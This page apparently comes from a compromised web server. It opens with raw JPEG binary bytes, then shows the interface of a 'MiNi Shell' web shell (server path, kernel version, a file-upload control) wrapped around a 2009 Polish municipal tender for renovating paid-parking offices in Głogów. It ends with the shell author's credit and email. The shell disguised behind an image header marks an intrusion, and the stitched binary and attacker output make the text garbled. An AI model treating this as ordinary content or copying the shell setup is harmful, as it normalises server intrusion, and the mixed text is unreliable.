JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090410/101642-N-2009.html

<p class="kh_header"><b>Głogów: WYKONANIE STREF PŁATNEGO PARKOWANIA w zakresie: modernizacji 3 pawilonów usługowo-handlowych z przeznaczeniem na biura stref płatnego parkowania na targowisku przy ul. Wały Chrobrego</b><br>
<b>Numer ogłoszenia: 101642 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Głogowskie Obiekty Usługowe , ul. Wita Stwosza 1, 67-200 Głogów, woj. dolnośląskie, tel. 076 8334845, faks 076 8352208.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biuletyn.sbip.pl/gou/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE STREF PŁATNEGO PARKOWANIA w zakresie: modernizacji 3 pawilonów usługowo-handlowych z przeznaczeniem na biura stref płatnego parkowania na targowisku przy ul. Wały Chrobrego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont kapitalny pod klucz pomieszczeń o powierzchni łącznej 48 m2 - nowa instalacja elektryczna, wykonanie 2 pomieszczeń WC, wyburzenia ścian, szpachlowanie, malowanie, ułożenie posadzki z płytek podłogowych, wyposażenie w meble i inne sprzęty biurowe, klimatyzacja, instalacja alarmowa..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 39.13.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium
Wadium - zasady wnoszenia, zwrotu i utraty regulują przepisy pzp: art. 45 i 46
Wysokość wadium Zamawiający ustalił w kwocie: 2.000,00 zł.
		słownie: dwa tysiące  złotych 00/100.
Miejsce wnoszenia wadium: 
-	w przypadku wnoszenia wadium w pieniądzu - przelew na konto 38 8646 0008 0000 0014 0432 0002 
-	pozostałe formy dopuszczone w pzp: należy składać w kasie firmy - adres siedziby.
Wadium winno być wniesione przed upływem terminu składania ofert tj. do dnia 
        04.05.2009 r. do godz.: 12.00.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 8. Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków.
8.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	Spełniają wymogi art. 22 ust. 1 ustawy pzp
2)	Nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy pzp
3)	Wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 3 roboty budowlane odpowiadające swym rodzajem robotom budowlanym stanowiącym przedmiot zamówienia. Zamawiający za robotę podobną uzna  wykonanie pod klucz lub kapitalny remont pomieszczeń o powierzchni co najmniej 60 m2.
4)	Dysponują lub będą dysponować osobami  posiadającymi uprawnienia  do:
-	kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, elektrycznej i instalacji wod-kan, w zakresie niezbędnym do wykonania zamówienia,
-	posiadającymi aktualne zaświadczenie o przynależności do OIIB,
5)	Posiadają środki finansowe w wysokości co najmniej 100.000,00 zł lub zdolność kredytową w wysokości co najmniej 100.000,00 zł .
6)	Posiadają ubezpieczenie OC w zakresie prowadzonej działalności .

  8.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie za?mó?wie?nia.
8.3. W przypadku, o którym mowa w pkt 8.2, wykonawcy usta?nawiają pełnomocnika
        do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania 
        w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
8.4. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, o których
       mowa w pkt. 8.3.
8.5. Z postępowania o udzielenie zamówienia wyklucza się:
1) wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat  przed wszczęciem postępowania,;
2) wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenie wierzycieli poprzez likwidację majątku upadłego;
3) wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdro?wotne, z wyjątkiem przypadków gdy uzyskali oni prze?widziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wyko?nania decyzji właściwego organu;
4) osoby fizyczne, które prawomocnie skazano za prze?stępstwo popełnione w związku        z postępowaniem o udzie?lenie zamówienia, przestępstwo przeciwko prawom osób wykonujących prace zarobkową,  przestępstwo przekupstwa, prze?stępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5) spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie  przestępstwa lub przestępstwa skarbowego;
6) spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie  przestępstwa lub przestępstwa skarbowego;
7) spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem               o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie  przestępstwa lub przestępstwa skarbowego;
8) osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie  przestępstwa lub przestępstwa skarbowego;
9) podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary; 
10) wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3.
8.6. Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy:
1) wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi  w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2; 
2) złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępo?wania;
3) nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3, 
4) nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą. 
8.7. Zamawiający zawiadamia równocześnie wykonawców, którzy zostali wykluczeni 
        z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne, 
        z zastrzeżeniem art. 92 ust 1 pkt 3.
8.8. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

8.9. Zamawiający odrzuci ofertę, jeżeli:
1) jest niezgodna z ustawą;
2) jej treść nie odpowiada treści specyfikacji istotnych warun?ków zamówienia, z zastrzeżeniem art. 87 ust.2 pkt 3 ustawy pzp,
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozu?mieniu przepisów                    o zwalczaniu nieuczciwej konkurencji;
4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
5) została złożona przez wykonawcę wykluczonego z udziału w postępowaniu                     o udzielenie zamówienia;
6) zawiera  błędy w obli?czeniu ceny;
7) wykonawca w terminie 3 dni od dnia doręczenia  za?wiadomienia nie zgodził się na poprawienie omyłki ,o której mowa w art.87 ust.2 pkt 3,
8) jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania przez wykonawców warunków, o których mowa w art.
       26 ust. 1 pzp żąda następujących dokumentów:

1)	Formularz oferty - zał. Nr 1 do SIWZ.
2)	Protokół z wizji terenu objętego zamówieniem potwierdzony przez osobę reprezentującą Zamawiającego.
3)	Kosztorys ofertowy opracowany metodą uproszczoną dla robót budowlanych oraz kalkulację cenową na dostawę wyposażenia - zał 1a do SIWZ..
     Uwaga !
     Podane przy poszczególnych pozycjach przedmiaru numery katalogów mają jedynie charakter informacyjny. Wykonawca ma prawo stosować przy wycenie poszczególnych pozycji przedmiaru kalkulację własną.
4)	Dowód wniesienia  wadium.
5)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
     Zaświadczenie o wpisie do ewidencji działalności gospodarczej musi posiadać adnotację właściwego organu wydającego to zaświadczenie o aktualności zapisów - dokonaną w terminie jak wyżej.
6)	Wykonawcy wspólnie ubiegający się o zmówienie zobowiązani są złożyć do wniosku:
-	Pełnomocnictwo udzielone jednemu z partnerów, przez pozostałych wykonawców,     do reprezentowania ich w przedmiotowym postępowaniu albo reprezentowaniu w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
-	Jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy, umowę regulującą współpracę tych wykonawców.
7)   Oświadczenie  o spełnieniu warunków udziału w postępowaniu w trybie art.22 pzp
       - zał.Nr 2 do SIWZ,   
8)   Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają 
       wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich
      uprawnień - zgodnie z załącznikiem Nr 4 do SIWZ              
9)  Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  potwierdzające odpowiednio, że  wykonawca nie zalega z opłacaniem  podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego  organu  -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.               
10) Informacji na temat przeciętnej liczby zatrudnionych pracowników lub liczebność 
     personelu kierowniczego w okresie ostatnich 3-ch lat, a w przypadku gdy okres  
     prowadzenia działalności jest krótszy - w tym okresie - zał Nr 4 do SIWZ.
11) Wykazu osób lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby  którymi będzie dysponował i które  będą uczestniczyć w wykonywaniu zamówienia   wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych  do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności -     zał. Nr 4 do SIWZ , 
12)Informacja nt. części zamówienia jakie wykonawca zamierza powierzyć podwykonawcom- zał Nr 5 do SIWZ.
13) wykazu wykonanych robót budowlanych  w okresie ostatnich pięciu lat przed dniem   
      wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia    
      działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie,- zał. Nr 3 do SIWZ,
14) Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym 
       wykonawca posiada rachunek, potwierdzająca wysokość  posiadanych środków  
       finansowych w wysokości co najmniej 100.000,00 - zł.   lub   zdolność kredytową 
      wykonawcy na kwotę co najmniej 100.000,00 zł. wystawiona  nie wcześniej  niż 3 
      miesiące przed upływem terminu składania ofert,
 15) Polisy, a w przypadku jej braku innego dokumentu  potwierdzającego, że  wykonawca   jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Wykonawca mający  siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
       Polskiej składa dokumenty zgodnie z przepisami rozporządzenia Prezesa rady Ministrów 
       z dnia 19 maja 2006r. w sprawie rodzajów dokumentów ,jakich może żądać Zamawiający 
       od Wykonawcy oraz form w jakich te dokumenty mogą być składane ( Dz.U. z 2008r. Nr 
       188 poz.1155) 
Dokumenty, o których mowa w  j.w. należy składać w formie oryginału lub kserokopii 
       poświadczonej za zgodność z oryginałem przez wykonawcę.                                                9.4. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii
       dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest 
        nieczytelna lub budzi wątpliwości co do jej prawdziwości.                                                                                9.5. Dokumenty sporządzone w języku obcym, inne niż określone j.w. należy składać wraz            
        z tłumaczeniem na język polski, poświadczonym przez wykonawcę. Tłumaczenie nie 
        jest  wymagane, jeżeli Zamawiający wyraził zgodę, o której mowa w art. 9 ust. 3 ustawy.                                                                    9.6. Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art.25 ust.1 upzp, lub którzy nie złożyli pełnomocnictwa, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust 1 ustawy pzp, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie chyba ,że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.sbip.pl/gou/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Głogowskie Obiekty Usługowe
ul. Wita Stwosza 1, 67-200 Głogów  
mail: poczta@gou.glogow.pl, tel. 076 833 48 45, fax 076 835 22 08.
godz. pracy od poniedziałku do piątku: 7.00 - 15.00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 12:00, miejsce: Głogowskie Obiekty Usługowe
ul. Wita Stwosza 1, 67-200 Głogów  
mail: poczta@gou.glogow.pl, tel. 076 833 48 45, fax 076 835 22 08.
godz. pracy od poniedziałku do piątku: 7 - 15.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com